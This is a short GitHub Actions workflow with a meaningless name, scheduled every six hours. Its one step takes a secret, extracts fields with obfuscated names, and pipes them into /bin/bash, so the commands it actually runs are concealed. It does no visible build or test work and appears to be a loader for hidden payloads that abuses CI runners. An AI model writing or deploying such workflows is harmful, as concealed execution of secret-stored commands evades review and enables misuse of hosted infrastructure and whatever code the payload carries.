name: huangganshi9316
on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangganshi9316
        env:
          iw31: ${{ secrets.iw31 }}
        run: |
          echo $iw31 | jq -r .srly7086 | /bin/bash
          echo $q7285 | jq -r .ygbei104 | /bin/bash
          echo $w7695 | jq -r .emzt32 | /bin/bash
          echo $rgg3553 | jq -r .ui63456 | /bin/bash

